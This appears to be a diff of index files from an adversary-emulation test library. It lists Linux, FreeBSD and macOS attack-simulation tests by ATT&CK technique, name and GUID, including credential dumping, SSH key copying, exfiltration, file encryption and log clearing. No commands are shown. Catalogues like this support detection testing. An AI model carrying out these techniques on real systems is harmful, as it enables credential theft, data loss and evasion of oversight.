310 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 9 LaZagne.py - Dump Credentials from Firefox Browser 87e88698-621b-4c45-8a89-4eaebdeaabb1 sh
311 credential-access T1552.004 Unsecured Credentials: Private Keys 2 Discover Private SSH Keys 46959285-906d-40fa-9437-5a439accd878 sh
312 credential-access T1552.004 Unsecured Credentials: Private Keys 3 Copy Private SSH Keys with CP 7c247dc7-5128-4643-907b-73a76d9135c3 sh
313 credential-access T1552.004 Unsecured Credentials: Private Keys 4 Copy Private SSH Keys with CP (freebsd) 12e4a260-a7fd-4ed8-bf18-1a28c1395775 sh
314 credential-access T1552.004 Unsecured Credentials: Private Keys 5 Copy Private SSH Keys with rsync 864bb0b2-6bb5-489a-b43b-a77b3a16d68a sh
315 credential-access T1552.004 Unsecured Credentials: Private Keys 6 Copy Private SSH Keys with rsync (freebsd) 922b1080-0b95-42b0-9585-b9a5ea0af044 sh
316 credential-access T1552.004 Unsecured Credentials: Private Keys 7 Copy the users GnuPG directory with rsync 2a5a0601-f5fb-4e2e-aa09-73282ae6afca sh
317 credential-access T1552.004 Unsecured Credentials: Private Keys 8 Copy the users GnuPG directory with rsync (freebsd) b05ac39b-515f-48e9-88e9-2f141b5bcad0 sh
318 credential-access T1552.003 Unsecured Credentials: Bash History 1 Search Through Bash History 3cfde62b-7c33-4b26-a61e-755d6131c8ce sh
319 credential-access T1552.003 Unsecured Credentials: Bash History 2 Search Through sh History d87d3b94-05b4-40f2-a80f-99864ffa6803 sh
320 credential-access T1552.001 Unsecured Credentials: Credentials In Files 1 Find AWS credentials 37807632-d3da-442e-8c2e-00f44928ff8f sh
321 credential-access T1552.001 Unsecured Credentials: Credentials In Files 3 Extract passwords with grep bd4cf0d1-7646-474e-8610-78ccf5a097c4 sh
322 credential-access T1552.001 Unsecured Credentials: Credentials In Files 6 Find and Access Github Credentials da4f751a-020b-40d7-b9ff-d433b7799803 bash
323 credential-access T1552.001 Unsecured Credentials: Credentials In Files 15 Find Azure credentials a8f6148d-478a-4f43-bc62-5efee9f931a4 sh
324 credential-access T1552.001 Unsecured Credentials: Credentials In Files 16 Find GCP credentials aa12eb29-2dbb-414e-8b20-33d34af93543 sh
325 credential-access T1552.001 Unsecured Credentials: Credentials In Files 17 Find OCI credentials 9d9c22c9-fa97-4008-a204-478cf68c40af sh
326 credential-access T1110.004 Brute Force: Credential Stuffing 1 SSH Credential Stuffing From Linux 4f08197a-2a8a-472d-9589-cd2895ef22ad bash
327 credential-access T1110.004 Brute Force: Credential Stuffing 3 SSH Credential Stuffing From FreeBSD a790d50e-7ebf-48de-8daa-d9367e0911d4 sh
328 credential-access T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow 1 Access /etc/shadow (Local) 3723ab77-c546-403c-8fb4-bb577033b235 bash
329 credential-access T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow 2 Access /etc/master.passwd (Local) 5076874f-a8e6-4077-8ace-9e5ab54114a5 sh
330 credential-access T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow 3 Access /etc/passwd (Local) 60e860b6-8ae6-49db-ad07-5e73edd88f5d sh
331 credential-access T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow 4 Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat df1a55ae-019d-4120-bc35-94f4bc5c4b0a sh
332 credential-access T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow 5 Access /etc/{shadow,passwd,master.passwd} with shell builtins f5aa6543-6cb2-4fae-b9c2-b96e14721713 sh
333 discovery T1033 System Owner/User Discovery 2 System Owner/User Discovery 2a9b677d-a230-44f4-ad86-782df1ef108c sh
334 discovery T1016.001 System Network Configuration Discovery: Internet Connection Discovery 2 Check internet connection using ping freebsd, linux or macos be8f4019-d8b6-434c-a814-53123cdcc11e bash
335 discovery T1087.002 Account Discovery: Domain Account 23 Active Directory Domain Search 096b6d2a-b63f-4100-8fa0-525da4cd25ca sh
336 discovery T1087.002 Account Discovery: Domain Account 24 Account Enumeration with LDAPDomainDump a54d497e-8dbe-4558-9895-44944baa395f sh
337 discovery T1087.001 Account Discovery: Local Account 1 Enumerate all accounts (Local) f8aab3dd-5990-4bf8-b8ab-2226c951696f sh
338 discovery T1087.001 Account Discovery: Local Account 2 View sudoers access fed9be70-0186-4bde-9f8a-20945f9370c2 sh
339 discovery T1087.001 Account Discovery: Local Account 3 View accounts with UID 0 c955a599-3653-4fe5-b631-f11c00eb0397 sh
340 discovery T1087.001 Account Discovery: Local Account 4 List opened files by user 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb sh
341 discovery T1087.001 Account Discovery: Local Account 5 Show if a user account has ever logged in remotely 0f0b6a29-08c3-44ad-a30b-47fd996b2110 sh
342 discovery T1087.001 Account Discovery: Local Account 6 Enumerate users and groups e6f36545-dc1e-47f0-9f48-7f730f54a02e sh
343 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 1 Detect Virtualization Environment (Linux) dfbd1a21-540d-4574-9731-e852bd6fe840 sh
344 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 2 Detect Virtualization Environment (FreeBSD) e129d73b-3e03-4ae9-bf1e-67fc8921e0fd sh
345 discovery T1069.002 Permission Groups Discovery: Domain Groups 15 Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS d58d749c-4450-4975-a9e9-8b1d562755c2 sh
346 discovery T1007 System Service Discovery 3 System Service Discovery - systemctl/service f4b26bce-4c2c-46c0-bcc5-fce062d38bef bash
347 discovery T1040 Network Sniffing 1 Packet Capture Linux using tshark or tcpdump 7fe741f7-b265-4951-a7c7-320889083b3e bash
348 discovery T1040 Network Sniffing 2 Packet Capture FreeBSD using tshark or tcpdump c93f2492-9ebe-44b5-8b45-36574cccfe67 sh
349 discovery T1040 Network Sniffing 10 Packet Capture FreeBSD using /dev/bpfN with sudo e2028771-1bfb-48f5-b5e6-e50ee0942a14 sh
350 discovery T1040 Network Sniffing 11 Filtered Packet Capture FreeBSD using /dev/bpfN with sudo a3a0d4c9-c068-4563-a08d-583bd05b884c sh
351 discovery T1040 Network Sniffing 12 Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo 10c710c9-9104-4d5f-8829-5b65391e2a29 bash
352 discovery T1040 Network Sniffing 13 Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo 7a0895f0-84c1-4adf-8491-a21510b1d4c1 bash
353 discovery T1040 Network Sniffing 14 Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo 515575ab-d213-42b1-aa64-ef6a2dd4641b bash
354 discovery T1040 Network Sniffing 15 Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo b1cbdf8b-6078-48f5-a890-11ea19d7f8e9 bash
355 discovery T1135 Network Share Discovery 2 Network Share Discovery - linux 875805bc-9e86-4e87-be86-3a5527315cae bash
356 discovery T1135 Network Share Discovery 3 Network Share Discovery - FreeBSD 77e468a6-3e5c-45a1-9948-c4b5603747cb sh
357 discovery T1082 System Information Discovery 3 List OS Information cccb070c-df86-4216-a5bc-9fb60c74e27c sh
358 discovery T1082 System Information Discovery 4 Linux VM Check via Hardware 31dad7ad-2286-4c02-ae92-274418c85fec bash
359 discovery T1082 System Information Discovery 5 Linux VM Check via Kernel Modules 8057d484-0fae-49a4-8302-4812c4f1e64e bash
360 discovery T1082 System Information Discovery 6 FreeBSD VM Check via Kernel Modules eefe6a49-d88b-41d8-8fc2-b46822da90d3 sh
361 discovery T1082 System Information Discovery 8 Hostname Discovery 486e88ea-4f56-470f-9b57-3f4d73f39133 sh
362 discovery T1082 System Information Discovery 12 Environment variables discovery on freebsd, macos and linux fcbdd43f-f4ad-42d5-98f3-0218097e2720 sh
363 discovery T1082 System Information Discovery 25 Linux List Kernel Modules 034fe21c-3186-49dd-8d5d-128b35f181c7 sh
364 discovery T1082 System Information Discovery 26 FreeBSD List Kernel Modules 4947897f-643a-4b75-b3f5-bed6885749f6 sh
365 discovery T1497.003 Time Based Evasion 1 Delay execution with ping 8b87dd03-8204-478c-bac3-3959f6528de3 sh
366 discovery T1217 Browser Bookmark Discovery 1 List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux 3a41f169-a5ab-407f-9269-abafdb5da6c2 sh
367 discovery T1217 Browser Bookmark Discovery 4 List Google Chromium Bookmark JSON Files on FreeBSD 88ca025b-3040-44eb-9168-bd8af22b82fa sh
368 discovery T1016 System Network Configuration Discovery 3 System Network Configuration Discovery c141bbdb-7fca-4254-9fd6-f47e79447e17 sh
369 discovery T1083 File and Directory Discovery 3 Nix File and Directory Discovery ffc8b249-372a-4b74-adcd-e4c0430842de sh
370 discovery T1083 File and Directory Discovery 4 Nix File and Directory Discovery 2 13c5e1ae-605b-46c4-a79f-db28c77ff24e sh
371 discovery T1083 File and Directory Discovery 8 Identifying Network Shares - Linux 361fe49d-0c19-46ec-a483-ccb92d38e88e sh
372 discovery T1049 System Network Connections Discovery 3 System Network Connections Discovery FreeBSD, Linux & MacOS 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 sh
373 discovery T1057 Process Discovery 1 Process Discovery - ps 4ff64f0b-aaf2-4866-b39d-38d9791407cc sh
374 discovery T1069.001 Permission Groups Discovery: Local Groups 1 Permission Groups Discovery (Local) 952931a4-af0b-4335-bbbe-73c8c5b327ae sh
375 discovery T1201 Password Policy Discovery 1 Examine password complexity policy - Ubuntu 085fe567-ac84-47c7-ac4c-2688ce28265b bash
376 discovery T1201 Password Policy Discovery 2 Examine password complexity policy - FreeBSD a7893624-a3d7-4aed-9676-80498f31820f sh
377 discovery T1201 Password Policy Discovery 3 Examine password complexity policy - CentOS/RHEL 7.x 78a12e65-efff-4617-bc01-88f17d71315d bash
378 discovery T1201 Password Policy Discovery 4 Examine password complexity policy - CentOS/RHEL 6.x 6ce12552-0adb-4f56-89ff-95ce268f6358 bash
379 discovery T1201 Password Policy Discovery 5 Examine password expiration policy - All Linux 7c86c55c-70fa-4a05-83c9-3aa19b145d1a bash
380 discovery T1614.001 System Location Discovery: System Language Discovery 3 Discover System Language with locale 837d609b-845e-4519-90ce-edc3b4b0e138 sh
381 discovery T1614.001 System Location Discovery: System Language Discovery 4 Discover System Language with localectl 07ce871a-b3c3-44a3-97fa-a20118fdc7c9 sh
382 discovery T1614.001 System Location Discovery: System Language Discovery 5 Discover System Language by locale file 5d7057c9-2c8a-4026-91dd-13b5584daa69 sh
383 discovery T1614.001 System Location Discovery: System Language Discovery 6 Discover System Language by Environment Variable Query cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a sh
384 discovery T1614 System Location Discovery 2 Get geolocation info through IP-Lookup services using curl freebsd, linux or macos 552b4db3-8850-412c-abce-ab5cc8a86604 bash
385 discovery T1518.001 Software Discovery: Security Software Discovery 4 Security Software Discovery - ps (Linux) 23b91cd2-c99c-4002-9e41-317c63e024a2 sh
386 discovery T1518.001 Software Discovery: Security Software Discovery 5 Security Software Discovery - pgrep (FreeBSD) fa96c21c-5fd6-4428-aa28-51a2fbecdbdc sh
387 discovery T1018 Remote System Discovery 6 Remote System Discovery - arp nix acb6b1ff-e2ad-4d64-806c-6c35fe73b951 sh
388 discovery T1018 Remote System Discovery 7 Remote System Discovery - sweep 96db2632-8417-4dbb-b8bb-a8b92ba391de sh
389 discovery T1018 Remote System Discovery 12 Remote System Discovery - ip neighbour 158bd4dd-6359-40ab-b13c-285b9ef6fa25 sh
390 discovery T1018 Remote System Discovery 13 Remote System Discovery - ip route 1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1 sh
391 discovery T1018 Remote System Discovery 14 Remote System Discovery - netstat d2791d72-b67f-4615-814f-ec824a91f514 sh
392 discovery T1018 Remote System Discovery 15 Remote System Discovery - ip tcp_metrics 6c2da894-0b57-43cb-87af-46ea3b501388 sh
393 discovery T1046 Network Service Discovery 1 Port Scan 68e907da-2539-48f6-9fc9-257a78c05540 bash
394 discovery T1046 Network Service Discovery 2 Port Scan Nmap 515942b0-a09f-4163-a7bb-22fefb6f185f sh
395 discovery T1046 Network Service Discovery 12 Port Scan using nmap (Port range) 0d5a2b03-3a26-45e4-96ae-89485b4d1f97 sh
396 discovery T1124 System Time Discovery 3 System Time Discovery in FreeBSD/macOS f449c933-0891-407f-821e-7916a21a1a6f sh
397 execution T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 sh
398 execution T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
399 execution T1053.003 Scheduled Task/Job: Cron 3 Cron - Add script to /etc/cron.d folder 078e69eb-d9fb-450e-b9d0-2e118217c846 sh
400 execution T1053.003 Scheduled Task/Job: Cron 4 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
401 execution T1053.006 Scheduled Task/Job: Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
402 execution T1053.006 Scheduled Task/Job: Systemd Timers 2 Create a user level transient systemd service and timer 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec sh
403 execution T1053.006 Scheduled Task/Job: Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
404 execution T1059.004 Command and Scripting Interpreter: Bash 1 Create and Execute Bash Shell Script 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 sh
405 execution T1059.004 Command and Scripting Interpreter: Bash 2 Command-Line Interface d0c88567-803d-4dca-99b4-7ce65e7b257c sh
406 execution T1059.004 Command and Scripting Interpreter: Bash 3 Harvest SUID executable files 46274fc6-08a7-4956-861b-24cbbaa0503c sh
407 execution T1059.004 Command and Scripting Interpreter: Bash 4 LinEnum tool execution a2b35a63-9df1-4806-9a4d-5fe0500845f2 sh
408 execution T1059.004 Command and Scripting Interpreter: Bash 5 New script file in the tmp directory 8cd1947b-4a54-41fb-b5ea-07d0ace04f81 sh
409 execution T1059.004 Command and Scripting Interpreter: Bash 6 What shell is running 7b38e5cc-47be-44f0-a425-390305c76c17 sh
410 execution T1059.004 Command and Scripting Interpreter: Bash 7 What shells are available bf23c7dc-1004-4949-8262-4c1d1ef87702 sh
411 execution T1059.004 Command and Scripting Interpreter: Bash 8 Command line scripts b04ed73c-7d43-4dc8-b563-a2fc595cba1a sh
412 execution T1059.004 Command and Scripting Interpreter: Bash 9 Obfuscated command line scripts 5bec4cc8-f41e-437b-b417-33ff60acf9af sh
413 execution T1059.004 Command and Scripting Interpreter: Bash 10 Change login shell c7ac59cb-13cc-4622-81dc-6d2fee9bfac7 bash
414 execution T1059.004 Command and Scripting Interpreter: Bash 11 Environment variable scripts bdaebd56-368b-4970-a523-f905ff4a8a51 sh
415 execution T1059.004 Command and Scripting Interpreter: Bash 12 Detecting pipe-to-shell fca246a8-a585-4f28-a2df-6495973976a1 sh
416 execution T1059.004 Command and Scripting Interpreter: Bash 13 Current kernel information enumeration 3a53734a-9e26-4f4b-ad15-059e767f5f14 sh
417 execution T1059.004 Command and Scripting Interpreter: Bash 14 Shell Creation using awk command ee72b37d-b8f5-46a5-a9e7-0ff50035ffd5 sh
418 execution T1059.004 Command and Scripting Interpreter: Bash 15 Creating shell using cpan command bcd4c2bc-490b-4f91-bd31-3709fe75bbdf sh
419 execution T1059.004 Command and Scripting Interpreter: Bash 16 Shell Creation using busybox command ab4d04af-68dc-4fee-9c16-6545265b3276 sh
420 execution T1059.004 Command and Scripting Interpreter: Bash 17 emacs spawning an interactive system shell e0742e38-6efe-4dd4-ba5c-2078095b6156 sh
421 execution T1059.006 Command and Scripting Interpreter: Python 1 Execute shell script via python's command mode arguement 3a95cdb2-c6ea-4761-b24e-02b71889b8bb sh
422 execution T1059.006 Command and Scripting Interpreter: Python 2 Execute Python via scripts 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 sh
423 execution T1059.006 Command and Scripting Interpreter: Python 3 Execute Python via Python executables 0b44d79b-570a-4b27-a31f-3bf2156e5eaa sh
424 execution T1059.006 Command and Scripting Interpreter: Python 4 Python pty module and spawn function used to spawn sh or bash 161d694c-b543-4434-85c3-c3a433e33792 sh
425 execution T1053.002 Scheduled Task/Job: At 2 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
426 impact T1489 Service Stop 4 Linux - Stop service using systemctl 42e3a5bd-1e45-427f-aa08-2a65fa29a820 sh
427 impact T1489 Service Stop 5 Linux - Stop service by killing process using killall e5d95be6-02ee-4ff1-aebe-cf86013b6189 sh
428 impact T1489 Service Stop 6 Linux - Stop service by killing process using kill 332f4c76-7e96-41a6-8cc2-7361c49db8be sh
429 impact T1489 Service Stop 7 Linux - Stop service by killing process using pkill 08b4718f-a8bf-4bb5-a552-294fc5178fea sh
430 impact T1489 Service Stop 8 Abuse of linux magic system request key for Send a SIGTERM to all processes 6e76f56f-2373-4a6c-a63f-98b7b72761f1 bash
431 impact T1531 Account Access Removal 4 Change User Password via passwd 3c717bf3-2ecc-4d79-8ac8-0bfbf08fbce6 sh
432 impact T1486 Data Encrypted for Impact 1 Encrypt files using gpg (FreeBSD/Linux) 7b8ce084-3922-4618-8d22-95f996173765 sh
433 impact T1486 Data Encrypted for Impact 2 Encrypt files using 7z (FreeBSD/Linux) 53e6735a-4727-44cc-b35b-237682a151ad sh
434 impact T1486 Data Encrypted for Impact 3 Encrypt files using ccrypt (FreeBSD/Linux) 08cbf59f-85da-4369-a5f4-049cffd7709f sh
435 impact T1486 Data Encrypted for Impact 4 Encrypt files using openssl (FreeBSD/Linux) 142752dc-ca71-443b-9359-cf6f497315f1 sh
436 impact T1496 Resource Hijacking 1 FreeBSD/macOS/Linux - Simulate CPU Load with Yes 904a5a0e-fb02-490d-9f8d-0e256eb37549 sh
437 impact T1485 Data Destruction 2 FreeBSD/macOS/Linux - Overwrite file with DD 38deee99-fd65-4031-bec8-bfa4f9f26146 sh
438 impact T1529 System Shutdown/Reboot 3 Restart System via `shutdown` - FreeBSD/macOS/Linux 6326dbc4-444b-4c04-88f4-27e94d0327cb sh
439 impact T1529 System Shutdown/Reboot 4 Shutdown System via `shutdown` - FreeBSD/macOS/Linux 4963a81e-a3ad-4f02-adda-812343b351de sh
440 impact T1529 System Shutdown/Reboot 5 Restart System via `reboot` - FreeBSD/macOS/Linux 47d0b042-a918-40ab-8cf9-150ffe919027 sh
441 impact T1529 System Shutdown/Reboot 6 Shutdown System via `halt` - FreeBSD/Linux 918f70ab-e1ef-49ff-bc57-b27021df84dd sh
442 impact T1529 System Shutdown/Reboot 7 Reboot System via `halt` - FreeBSD 7b1cee42-320f-4890-b056-d65c8b884ba5 sh
443 impact T1529 System Shutdown/Reboot 8 Reboot System via `halt` - Linux 78f92e14-f1e9-4446-b3e9-f1b921f2459e bash
444 impact T1529 System Shutdown/Reboot 9 Shutdown System via `poweroff` - FreeBSD/Linux 73a90cd2-48a2-4ac5-8594-2af35fa909fa sh
445 impact T1529 System Shutdown/Reboot 10 Reboot System via `poweroff` - FreeBSD 5a282e50-86ff-438d-8cef-8ae01c9e62e1 sh
446 impact T1529 System Shutdown/Reboot 11 Reboot System via `poweroff` - Linux 61303105-ff60-427b-999e-efb90b314e41 bash
447 impact T1529 System Shutdown/Reboot 16 Abuse of Linux Magic System Request Key for Reboot d2a1f4bc-a064-4223-8281-a086dce5423c bash
448 initial-access T1195.002 Compromise Software Supply Chain 1 Simulate npm package installation on a Linux system a9604672-cd46-493b-b58f-fd4124c22dd3 bash
449 initial-access T1078.003 Valid Accounts: Local Accounts 8 Create local account (Linux) 02a91c34-8a5b-4bed-87af-501103eb5357 bash
450 initial-access T1078.003 Valid Accounts: Local Accounts 9 Reactivate a locked/expired account (Linux) d2b95631-62d7-45a3-aaef-0972cea97931 bash
451 initial-access T1078.003 Valid Accounts: Local Accounts 10 Reactivate a locked/expired account (FreeBSD) 09e3380a-fae5-4255-8b19-9950be0252cf sh
452 initial-access T1078.003 Valid Accounts: Local Accounts 11 Login as nobody (Linux) 3d2cd093-ee05-41bd-a802-59ee5c301b85 bash
453 initial-access T1078.003 Valid Accounts: Local Accounts 12 Login as nobody (freebsd) 16f6374f-7600-459a-9b16-6a88fd96d310 sh
454 exfiltration T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol 2 Exfiltrate data HTTPS using curl freebsd,linux or macos 4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01 bash
455 exfiltration T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol 3 Exfiltrate data in a file over HTTPS using wget 7ccdfcfa-6707-46bc-b812-007ab6ff951c sh
456 exfiltration T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol 4 Exfiltrate data as text over HTTPS using wget 8bec51da-7a6d-4346-b941-51eca448c4b0 sh
457 exfiltration T1048 Exfiltration Over Alternative Protocol 1 Exfiltration Over Alternative Protocol - SSH f6786cc8-beda-4915-a4d6-ac2f193bb988 sh
458 exfiltration T1048 Exfiltration Over Alternative Protocol 2 Exfiltration Over Alternative Protocol - SSH 7c3cb337-35ae-4d06-bf03-3032ed2ec268 sh
459 exfiltration T1048 Exfiltration Over Alternative Protocol 4 Exfiltrate Data using DNS Queries via dig a27916da-05f2-4316-a3ee-feec67a437be bash
460 exfiltration T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage 2 Exfiltrate data with rclone to cloud Storage - AWS S3 a4b74723-5cee-4300-91c3-5e34166909b4 powershell
461 exfiltration T1030 Data Transfer Size Limits 1 Data Transfer Size Limits ab936c51-10f4-46ce-9144-e02137b2016a sh
462 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 1 Exfiltration Over Alternative Protocol - HTTP 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff manual
463 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 3 Exfiltration Over Alternative Protocol - DNS c403b5a4-b5fc-49f2-b181-d1c80d27db45 manual
464 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 8 Python3 http.server 3ea1f938-f80a-4305-9aa8-431bc4867313 sh
atomics/Indexes/Indexes-CSV/macos-index.csv
-295
View File
@@ -1,295 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",4,chmod - Change file or folder mode (symbolic mode) recursively,0451125c-b5f6-488f-993b-5a32b09f7d8f,bash
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",5,chown - Change file or folder ownership and group,d169e71b-85f9-44ec-8343-27093ff3dfc0,bash
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",6,chown - Change file or folder ownership and group recursively,b78598be-ff39-448f-a463-adbf2a5b7848,bash
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",11,Chmod through c script,973631cf-6680-4ffa-a053-045e1b6b67ab,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",13,Chown through c script,18592ba1-5f88-4e3c-abc8-ab1c6042e389,sh
defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,1,Decode Eicar File and Write to File,7693ccaa-8d64-4043-92a5-a2eb70359535,powershell
defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,2,Decrypt Eicar File and Write to File,b404caaa-12ce-43c7-9214-62a531c044f7,powershell
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,5,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via ioreg,a960185f-aef6-4547-8350-d1ce16680d09,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,6,Detect Virtualization Environment using sysctl (hw.model),6beae646-eb4c-4730-95be-691a4094408c,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,7,Check if System Integrity Protection is enabled,2b73cd9b-b2fb-4357-b9d7-c73c41d9e945,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,8,Detect Virtualization Environment using system_profiler,e04d2e89-de15-4d90-92f9-a335c7337f0f,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",3,Delete log files using built-in log utility,653d39cd-bae7-499a-898c-9fb96b8b5cd1,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",4,Truncate system log files via truncate utility,6290f8a8-8ee9-4661-b9cf-390031bf6973,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",6,Delete log files via cat utility by appending /dev/null or /dev/zero,c23bdb88-928d-493e-b46d-df2906a50941,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",8,System log file deletion via find utility,bc8eeb4a-cc3e-45ec-aa6e-41e973da2558,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",9,Overwrite macOS system log via echo utility,0208ea60-98f1-4e8c-8052-930dce8f742c,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",11,Real-time system log clearance/deletion,848e43b3-4c0a-4e4c-b4c9-d1e8cea9651c,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",12,Delete system log files via unlink utility,03013b4b-01db-437d-909b-1fdaa5010ee8,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",14,Delete system log files using shred utility,86f0e4d5-3ca7-45fb-829d-4eda32b232bb,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",15,Delete system log files using srm utility,b0768a5e-0f32-4e75-ae5b-d036edcf96b6,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",16,Delete system log files using OSAScript,810a465f-cd4f-47bc-b43e-d2de3b033ecc,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",17,Delete system log files using Applescript,e62f8694-cbc7-468f-862c-b10cd07e1757,sh
defense-evasion,T1553.001,Subvert Trust Controls: Gatekeeper Bypass,1,Gatekeeper Bypass,fb3d46c6-9480-4803-8d7d-ce676e1f1a9b,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
